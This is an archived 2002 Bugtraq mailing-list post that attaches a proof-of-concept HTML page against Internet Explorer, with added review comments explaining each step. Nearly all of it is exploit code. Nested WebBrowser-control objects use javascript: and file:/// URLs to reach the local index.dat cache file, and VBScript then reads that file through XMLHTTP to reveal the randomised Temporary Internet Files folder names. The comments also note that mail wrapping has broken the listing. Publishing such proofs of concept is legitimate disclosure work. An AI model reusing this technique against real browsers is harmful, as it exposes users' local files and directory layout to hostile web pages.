[27008] in bugtraq
the attachement
daemon@ATHENA.MIT.EDU (jelmer)
Thu Sep 12 12:12:26 2002
Message-ID: <001e01c25a01$512a77c0$9e00000a@pluto>
From: "jelmer" <jkuperus@xs4all.nl>
To: <bugtraq@securityfocus.com>
Date: Thu, 12 Sep 2002 04:08:42 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
This is the enumeration.html file mentioned; apparently it caused my message
to get rejected over and over.
If someone could include it in the original "leveraging cross proto.." text,
I'd be much obliged.
<html>
<body onload="test()">
<script language="vbscript">
' extractPaths(filename)
' Fetches the resource at `filename` with a synchronous XMLHTTP GET, then reads
' eight fixed-position 8-byte fields out of the raw response and shows each one
' in a message box, appended to `filename` with its last 9 characters removed.
' Called from test() with the path captured from the 'b' object's markup.
' NOTE(review): the 8-byte fields are presumably the cache sub-directory names
' stored in the header of the index.dat referenced further down the page; the
' offsets are hard-coded, so this only holds for that file layout. Confirm.
' NOTE(review): what gets disclosed is local directory naming, which only works
' if script in this page is permitted to read a local path through XMLHTTP.
Sub extractPaths(filename)
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
' Third argument false = synchronous: send does not return until the response is in.
xmlHTTP.open "GET",filename,false
xmlHTTP.send
' responseBody is the raw byte array, hence the byte-wise midb/ascb calls below.
contents = xmlHTTP.responseBody
' Eight records, 12 bytes apart.
for i = 0 to 7
folder = ""
' Bytes 81..88 of the first record, 93..100 of the second, and so on (midb is 1-based).
for j = 81 + (i*12) to 88 + (i*12)
thischarcode = ascb(midb(contents,j,1))
folder = folder & chr(thischarcode)
next
' len(filename)-9 drops the trailing file name (presumably "index.dat", 9 characters)
' so the field is shown after the containing directory path.
msgbox mid(filename,1,len(filename)-9) + folder
next
end sub
</script>
<script language="javascript">
// Writes a zero-sized <object id=a> whose Location PARAM is a javascript: URL.
// That URL in turn writes a second zero-sized <object id=b> whose Location is a
// file:/// URL: a shell-namespace CLSID, then a relative path ending in
// Content.IE5/index.dat. test() later looks up id 'b' and reads its markup.
// NOTE(review): the string literals below are split across lines by mail
// wrapping (including the path, broken between "T" and "emporary"), so the
// listing does not parse as archived. The nested double quotes may also have
// lost entity encoding in transit. Left byte-for-byte as posted.
// NOTE(review): rooting the path at a CLSID rather than a drive letter
// presumably avoids having to know the user's profile directory. The chain
// depends on web content being able to point an embedded control at a
// file:/// location, so local-file zone restrictions are the control to check.
document.writeln('<object id=a
classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B width=0 height=0>');
document.writeln('<PARAM NAME=Location
VALUE="javascript:document.writeln("<object id=b
classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B width=0 height=0><PARAM
NAME=Location
VALUE=file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/../Local%20Settings/T
emporary%20Internet%20Files/Content.IE5/index.dat></object>");');
document.writeln('</object>');
// Entry point, invoked from <body onload="test()">.
// Waits 2000 ms, then reads the serialized markup of element 'b', extracts the
// text that follows '#' in its Location PARAM value, and hands that string to
// the VBScript routine extractPaths().
function test() {
setTimeout(
function () {
// Assigned without var, so 'elb' becomes an implicit global.
elb = document.getElementById('b');
// Capture group 1: everything after the last '#' in the VALUE, up to the next double quote.
var matcher = new RegExp('<PARAM.NAME=.Location..VALUE=.*#([^\\"]*).>');
// NOTE(review): exec() returns null when the markup does not match, so [1]
// throws in that case; the fixed 2 s delay is the only synchronisation.
extractPaths(matcher.exec(elb.innerHTML)[1]);
},
2000
);
}
</script>
</body>
</html>